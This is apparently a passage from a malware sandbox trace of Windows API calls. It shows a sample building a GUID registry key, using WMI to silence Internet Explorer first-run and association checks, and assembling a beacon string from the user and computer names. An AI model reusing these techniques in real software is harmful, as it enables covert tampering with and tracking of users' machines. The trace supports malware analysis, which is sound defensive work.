| out: lpString1="ModeChar") returned="ModeChar" [0043.620] lstrlenA (lpString="ModeChar") returned 8 [0043.620] lstrcpyA (in: lpString1=0x2c5a291, lpString2="Manager" | out: lpString1="Manager") returned="Manager" [0043.620] lstrcatA (in: lpString1="Manager", lpString2="Time" | out: lpString1="ManagerTime") returned="ManagerTime" [0043.620] lstrlenA (lpString="ManagerTime") returned 11 [0043.620] lstrcpyA (in: lpString1=0x2c5a29d, lpString2="System" | out: lpString1="System") returned="System" [0043.620] lstrcatA (in: lpString1="System", lpString2="Document" | out: lpString1="SystemDocument") returned="SystemDocument" [0043.620] lstrlenA (lpString="SystemDocument") returned 14 [0043.620] lstrcpyA (in: lpString1=0x2c5a2ac, lpString2="System" | out: lpString1="System") returned="System" [0043.620] lstrcatA (in: lpString1="System", lpString2="Stop" | out: lpString1="SystemStop") returned="SystemStop" [0043.620] lstrlenA (lpString="SystemStop") returned 10 [0043.620] lstrcpyA (in: lpString1=0x2c5a2b7, lpString2="Value" | out: lpString1="Value") returned="Value" [0043.620] lstrcatA (in: lpString1="Value", lpString2="Text" | out: lpString1="ValueText") returned="ValueText" [0043.620] lstrlenA (lpString="ValueText") returned 9 [0043.620] lstrcpyA (in: lpString1=0x2c5a2c1, lpString2="Folder" | out: lpString1="Folder") returned="Folder" [0043.620] lstrcatA (in: lpString1="Folder", lpString2="Virtual" | out: lpString1="FolderVirtual") returned="FolderVirtual" [0043.620] lstrlenA (lpString="FolderVirtual") returned 13 [0043.620] lstrcpyA (in: lpString1=0x2c5a2cf, lpString2="Junk" | out: lpString1="Junk") returned="Junk" [0043.620] lstrcatA (in: lpString1="Junk", lpString2="Type" | out: lpString1="JunkType") returned="JunkType" [0043.620] lstrlenA (lpString="JunkType") returned 8 [0043.620] lstrcpyA (in: lpString1=0x2c5a2d8, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0043.620] lstrcatA (in: lpString1="Virtual", lpString2="Core" | out: lpString1="VirtualCore") returned="VirtualCore" [0043.620] lstrlenA (lpString="VirtualCore") returned 11 [0043.620] lstrcpyA (in: lpString1=0x2c5a2e4, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0043.620] lstrcatA (in: lpString1="Virtual", lpString2="Tool" | out: lpString1="VirtualTool") returned="VirtualTool" [0043.620] lstrlenA (lpString="VirtualTool") returned 11 [0043.621] lstrcpyA (in: lpString1=0x2c5a2f0, lpString2="Return" | out: lpString1="Return") returned="Return" [0043.621] lstrcatA (in: lpString1="Return", lpString2="Black" | out: lpString1="ReturnBlack") returned="ReturnBlack" [0043.621] lstrlenA (lpString="ReturnBlack") returned 11 [0043.621] lstrcpyA (in: lpString1=0x2c5a2fc, lpString2="Tool" | out: lpString1="Tool") returned="Tool" [0043.621] lstrcatA (in: lpString1="Tool", lpString2="Paper" | out: lpString1="ToolPaper") returned="ToolPaper" [0043.621] lstrlenA (lpString="ToolPaper") returned 9 [0043.621] lstrcpyA (in: lpString1=0x2c5a306, lpString2="Memory" | out: lpString1="Memory") returned="Memory" [0043.621] lstrcatA (in: lpString1="Memory", lpString2="Pack" | out: lpString1="MemoryPack") returned="MemoryPack" [0043.621] lstrlenA (lpString="MemoryPack") returned 10 [0043.622] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59be8 | out: hHeap=0x2860000) returned 1 [0043.622] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a00 | out: hHeap=0x2860000) returned 1 [0043.622] lstrlenA (lpString="PackName") returned 8 [0043.622] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x12) returned 0x2c59a00 [0043.622] mbstowcs (in: _Dest=0x2c59a00, _Source="PackName", _MaxCount=0x9 | out: _Dest="PackName") returned 0x8 [0043.622] lstrlenA (lpString="SettingsTest") returned 12 [0043.622] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1a) returned 0x2c59a20 [0043.622] mbstowcs (in: _Dest=0x2c59a20, _Source="SettingsTest", _MaxCount=0xd | out: _Dest="SettingsTest") returned 0xc [0043.623] lstrlenA (lpString="ProcessUtil") returned 11 [0043.623] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x18) returned 0x2c59a48 [0043.623] mbstowcs (in: _Dest=0x2c59a48, _Source="ProcessUtil", _MaxCount=0xc | out: _Dest="ProcessUtil") returned 0xb [0043.623] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c59a68 [0043.623] wsprintfA (in: param_1=0x2c59a68, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="8486556D-1360-5666-BDF8-F7EA41AC1BBE") returned 36 [0043.623] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0043.623] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x4e) returned 0x2c59a98 [0043.623] lstrcpyA (in: lpString1=0x2c59a98, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0043.623] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="8486556D-1360-5666-BDF8-F7EA41AC1BBE" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\8486556D-1360-5666-BDF8-F7EA41AC1BBE") returned="Software\\AppDataLow\\Software\\Microsoft\\8486556D-1360-5666-BDF8-F7EA41AC1BBE" [0043.623] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0043.624] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c59a68 [0043.624] wsprintfA (in: param_1=0x2c59a68, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0501A5CE-A0FE-7FA1-D209-D423264D4807}") returned 38 [0043.624] lstrlenA (lpString="Local\\") returned 6 [0043.624] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2d) returned 0x2c59af0 [0043.624] lstrcpyA (in: lpString1=0x2c59af0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0043.624] lstrcatA (in: lpString1="Local\\", lpString2="{0501A5CE-A0FE-7FA1-D209-D423264D4807}" | out: lpString1="Local\\{0501A5CE-A0FE-7FA1-D209-D423264D4807}") returned="Local\\{0501A5CE-A0FE-7FA1-D209-D423264D4807}" [0043.624] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0043.624] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x23 [0043.624] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x46) returned 0x2c59b28 [0043.624] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x2c59b28, nSize=0x23 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0043.624] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 34 [0043.625] GetProcAddress (hModule=0x753a0000, lpProcName="StrCmpNIW") returned 0x753b4745 [0043.625] StrCmpNIW (lpStr1="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpStr2="C:\\Users\\kEecfMwgj\\Desktop\\e609894", nChar=34) returned -1 [0043.625] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0043.625] CreateWaitableTimerA (lpTimerAttributes=0x0, bManualReset=1, lpTimerName=0x0) returned 0x13c [0043.625] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0043.625] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0046.629] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x8) returned 0x2c59a68 [0046.629] GetProcAddress (hModule=0x756b0000, lpProcName="CoCreateInstance") returned 0x756f9d0b [0046.629] CoCreateInstance (in: rclsid=0x2c5889c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x2c588ac*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x11ff0f0 | out: ppv=0x11ff0f0*=0x774d20) returned 0x0 [0046.745] WbemLocator:IWbemLocator:ConnectServer (in: This=0x774d20, strNetworkResource="root\\default", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x11ff0f8 | out: ppNamespace=0x11ff0f8*=0x77e7f0) returned 0x0 [0047.939] GetProcAddress (hModule=0x756b0000, lpProcName="CoSetProxyBlanket") returned 0x756c5ea5 [0047.939] CoSetProxyBlanket (pProxy=0x77e7f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0047.939] WbemLocator:IUnknown:Release (This=0x774d20) returned 0x0 [0047.940] IWbemServices:GetObject (in: This=0x77e7f0, strObjectPath="StdRegProv", lFlags=0, pCtx=0x0, ppObject=0x2c59a6c*=0x28600c4, ppCallResult=0x0 | out: ppObject=0x2c59a6c*=0x795658, ppCallResult=0x0) returned 0x0 [0047.963] IWbemClassObject:GetMethod (in: This=0x795658, wszName="GetStringValue", lFlags=0, ppInSignature=0x11ff0b8, ppOutSignature=0x0 | out: ppInSignature=0x11ff0b8*=0x795c68, ppOutSignature=0x0) returned 0x0 [0047.963] IWbemClassObject:Put (This=0x795c68, wszName="hDefKey", lFlags=0, pVal=0x11ff070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000002, varVal2=0x0), Type=0) returned 0x0 [0047.963] IWbemClassObject:Put (This=0x795c68, wszName="sSubKeyName", lFlags=0, pVal=0x11ff070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\", varVal2=0x0), Type=0) returned 0x0 [0047.964] IWbemClassObject:Put (This=0x795c68, wszName="sValueName", lFlags=0, pVal=0x11ff070*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Version", varVal2=0x0), Type=0) returned 0x0 [0047.964] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="GetStringValue", lFlags=0, pCtx=0x0, pInParams=0x795c68, ppOutParams=0x11ff0c4*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff0c4*=0x7963c8, ppCallResult=0x0) returned 0x0 [0048.467] IWbemClassObject:Get (in: This=0x7963c8, wszName="ReturnValue", lFlags=0, pVal=0x11ff090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff090*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.467] IWbemClassObject:Get (in: This=0x7963c8, wszName="sValue", lFlags=0, pVal=0x11ff0e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff0e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="8.0.7601.17514", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.467] IUnknown:Release (This=0x7963c8) returned 0x0 [0048.468] IUnknown:Release (This=0x795c68) returned 0x0 [0048.468] lstrlenW (lpString="8.0.7601.17514") returned 14 [0048.468] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1e) returned 0x2c59b28 [0048.468] memcpy (in: _Dst=0x2c59b28, _Src=0x769994, _Size=0x1c | out: _Dst=0x2c59b28) returned 0x2c59b28 [0048.468] GetProcAddress (hModule=0x753a0000, lpProcName="StrToIntExW") returned 0x753d0196 [0048.468] StrToIntExW (in: pszString="8.0.7601.17514", dwFlags=0x0, piRet=0x11ff138 | out: piRet=0x11ff138) returned 1 [0048.468] lstrlenW (lpString="SOFTWARE\\Microsoft\\Internet Explorer\\") returned 37 [0048.468] lstrlenW (lpString="Main") returned 4 [0048.468] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x54) returned 0x2c59b50 [0048.468] memcpy (in: _Dst=0x2c59b50, _Src=0x2c595a8, _Size=0x4a | out: _Dst=0x2c59b50) returned 0x2c59b50 [0048.468] memcpy (in: _Dst=0x2c59b9a, _Src=0x2c595f4, _Size=0xa | out: _Dst=0x2c59b9a) returned 0x2c59b9a [0048.468] lstrlenA (lpString="IE10RunOnceLastShown_TIMESTAMP") returned 30 [0048.468] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x3e) returned 0x2c59bb0 [0048.468] mbstowcs (in: _Dest=0x2c59bb0, _Source="IE10RunOnceLastShown_TIMESTAMP", _MaxCount=0x1f | out: _Dest="IE10RunOnceLastShown_TIMESTAMP") returned 0x1e [0048.468] IWbemClassObject:GetMethod (in: This=0x795658, wszName="SetDWORDValue", lFlags=0, ppInSignature=0x11ff088, ppOutSignature=0x0 | out: ppInSignature=0x11ff088*=0x795dd8, ppOutSignature=0x0) returned 0x0 [0048.468] IWbemClassObject:Put (This=0x795dd8, wszName="hDefKey", lFlags=0, pVal=0x11ff040*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0048.468] IWbemClassObject:Put (This=0x795dd8, wszName="sSubKeyName", lFlags=0, pVal=0x11ff040*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0048.468] IWbemClassObject:Put (This=0x795dd8, wszName="sValueName", lFlags=0, pVal=0x11ff040*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown", varVal2=0x0), Type=0) returned 0x0 [0048.468] IWbemClassObject:Put (This=0x795dd8, wszName="uValue", lFlags=0, pVal=0x11ff0b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), Type=0) returned 0x0 [0048.469] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="SetDWORDValue", lFlags=0, pCtx=0x0, pInParams=0x795dd8, ppOutParams=0x11ff094*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff094*=0x7959b0, ppCallResult=0x0) returned 0x0 [0048.492] IWbemClassObject:Get (in: This=0x7959b0, wszName="ReturnValue", lFlags=0, pVal=0x11ff060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.492] IUnknown:Release (This=0x7959b0) returned 0x0 [0048.492] IUnknown:Release (This=0x795dd8) returned 0x0 [0048.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff108 | out: lpSystemTimeAsFileTime=0x11ff108*(dwLowDateTime=0x2ae91100, dwHighDateTime=0x1d92f76)) [0048.493] IWbemClassObject:GetMethod (in: This=0x795658, wszName="SetBinaryValue", lFlags=0, ppInSignature=0x11ff070, ppOutSignature=0x0 | out: ppInSignature=0x11ff070*=0x795dd8, ppOutSignature=0x0) returned 0x0 [0048.493] IWbemClassObject:Put (This=0x795dd8, wszName="hDefKey", lFlags=0, pVal=0x11ff028*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0048.493] IWbemClassObject:Put (This=0x795dd8, wszName="sSubKeyName", lFlags=0, pVal=0x11ff028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0048.493] IWbemClassObject:Put (This=0x795dd8, wszName="sValueName", lFlags=0, pVal=0x11ff028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE10RunOnceLastShown_TIMESTAMP", varVal2=0x0), Type=0) returned 0x0 [0048.493] IWbemClassObject:Put (This=0x795dd8, wszName="uValue", lFlags=0, pVal=0x11ff0a0*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x77fac0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x774ea0*, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0x0), Type=0) returned 0x0 [0048.493] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="SetBinaryValue", lFlags=0, pCtx=0x0, pInParams=0x795dd8, ppOutParams=0x11ff07c*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff07c*=0x7959b0, ppCallResult=0x0) returned 0x0 [0048.516] IWbemClassObject:Get (in: This=0x7959b0, wszName="ReturnValue", lFlags=0, pVal=0x11ff048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff048*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.517] IUnknown:Release (This=0x7959b0) returned 0x0 [0048.517] IUnknown:Release (This=0x795dd8) returned 0x0 [0048.517] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59bb0 | out: hHeap=0x2860000) returned 1 [0048.517] lstrlenA (lpString="IE8RunOnceLastShown_TIMESTAMP") returned 29 [0048.517] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x3c) returned 0x2c59bb0 [0048.517] mbstowcs (in: _Dest=0x2c59bb0, _Source="IE8RunOnceLastShown_TIMESTAMP", _MaxCount=0x1e | out: _Dest="IE8RunOnceLastShown_TIMESTAMP") returned 0x1d [0048.517] IWbemClassObject:GetMethod (in: This=0x795658, wszName="SetDWORDValue", lFlags=0, ppInSignature=0x11ff088, ppOutSignature=0x0 | out: ppInSignature=0x11ff088*=0x795dd8, ppOutSignature=0x0) returned 0x0 [0048.517] IWbemClassObject:Put (This=0x795dd8, wszName="hDefKey", lFlags=0, pVal=0x11ff040*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0048.517] IWbemClassObject:Put (This=0x795dd8, wszName="sSubKeyName", lFlags=0, pVal=0x11ff040*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0048.517] IWbemClassObject:Put (This=0x795dd8, wszName="sValueName", lFlags=0, pVal=0x11ff040*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE8RunOnceLastShown", varVal2=0x0), Type=0) returned 0x0 [0048.517] IWbemClassObject:Put (This=0x795dd8, wszName="uValue", lFlags=0, pVal=0x11ff0b8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), Type=0) returned 0x0 [0048.517] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="SetDWORDValue", lFlags=0, pCtx=0x0, pInParams=0x795dd8, ppOutParams=0x11ff094*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff094*=0x7959b0, ppCallResult=0x0) returned 0x0 [0048.539] IWbemClassObject:Get (in: This=0x7959b0, wszName="ReturnValue", lFlags=0, pVal=0x11ff060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.539] IUnknown:Release (This=0x7959b0) returned 0x0 [0048.539] IUnknown:Release (This=0x795dd8) returned 0x0 [0048.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff108 | out: lpSystemTimeAsFileTime=0x11ff108*(dwLowDateTime=0x2af03520, dwHighDateTime=0x1d92f76)) [0048.539] IWbemClassObject:GetMethod (in: This=0x795658, wszName="SetBinaryValue", lFlags=0, ppInSignature=0x11ff070, ppOutSignature=0x0 | out: ppInSignature=0x11ff070*=0x79d850, ppOutSignature=0x0) returned 0x0 [0048.540] IWbemClassObject:Put (This=0x79d850, wszName="hDefKey", lFlags=0, pVal=0x11ff028*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0048.540] IWbemClassObject:Put (This=0x79d850, wszName="sSubKeyName", lFlags=0, pVal=0x11ff028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0048.540] IWbemClassObject:Put (This=0x79d850, wszName="sValueName", lFlags=0, pVal=0x11ff028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="IE8RunOnceLastShown_TIMESTAMP", varVal2=0x0), Type=0) returned 0x0 [0048.540] IWbemClassObject:Put (This=0x79d850, wszName="uValue", lFlags=0, pVal=0x11ff0a0*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x77fac0*(cDims=0x1, fFeatures=0x80, cbElements=0x1, cLocks=0x0, pvData=0x774ea0*, rgsabound=((cElements=0x8, lLbound=0))), varVal2=0x0), Type=0) returned 0x0 [0048.540] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="SetBinaryValue", lFlags=0, pCtx=0x0, pInParams=0x79d850, ppOutParams=0x11ff07c*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff07c*=0x79e288, ppCallResult=0x0) returned 0x0 [0048.565] IWbemClassObject:Get (in: This=0x79e288, wszName="ReturnValue", lFlags=0, pVal=0x11ff048*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff048*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.565] IUnknown:Release (This=0x79e288) returned 0x0 [0048.565] IUnknown:Release (This=0x79d850) returned 0x0 [0048.566] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59bb0 | out: hHeap=0x2860000) returned 1 [0048.566] IWbemClassObject:GetMethod (in: This=0x795658, wszName="SetStringValue", lFlags=0, ppInSignature=0x11ff0a8, ppOutSignature=0x0 | out: ppInSignature=0x11ff0a8*=0x79d850, ppOutSignature=0x0) returned 0x0 [0048.566] IWbemClassObject:Put (This=0x79d850, wszName="hDefKey", lFlags=0, pVal=0x11ff060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x80000001, varVal2=0x0), Type=0) returned 0x0 [0048.566] IWbemClassObject:Put (This=0x79d850, wszName="sSubKeyName", lFlags=0, pVal=0x11ff060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SOFTWARE\\Microsoft\\Internet Explorer\\Main", varVal2=0x0), Type=0) returned 0x0 [0048.566] IWbemClassObject:Put (This=0x79d850, wszName="sValueName", lFlags=0, pVal=0x11ff060*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Check_Associations", varVal2=0x0), Type=0) returned 0x0 [0048.566] IWbemClassObject:Put (This=0x79d850, wszName="sValue", lFlags=0, pVal=0x11ff0d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="no", varVal2=0x0), Type=0) returned 0x0 [0048.566] IWbemServices:ExecMethod (in: This=0x77e7f0, strObjectPath="StdRegProv", strMethodName="SetStringValue", lFlags=0, pCtx=0x0, pInParams=0x79d850, ppOutParams=0x11ff0b4*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11ff0b4*=0x79e290, ppCallResult=0x0) returned 0x0 [0048.588] IWbemClassObject:Get (in: This=0x79e290, wszName="ReturnValue", lFlags=0, pVal=0x11ff080*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11ff080*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0048.588] IUnknown:Release (This=0x79e290) returned 0x0 [0048.588] IUnknown:Release (This=0x79d850) returned 0x0 [0048.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b50 | out: hHeap=0x2860000) returned 1 [0048.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0048.589] IUnknown:Release (This=0x795658) returned 0x0 [0048.589] WbemLocator:IUnknown:Release (This=0x77e7f0) returned 0x0 [0048.589] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0048.589] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0048.589] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0048.589] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0048.589] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0048.589] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2741393444651) returned 1 [0048.591] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=27413") returned 13 [0048.591] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0048.591] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0048.591] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0048.591] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0048.591] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c59a68, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0048.591] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0048.591] HeapFree (hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68) [0048.591] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0048.591] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0048.592] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0048.592] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0048.592] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0048.592] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0048.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRH7", lpUsedDefaultChar=0x0) returned 20 [0048.592] wsprintfA (in: param_1=0x2c5a5a7, 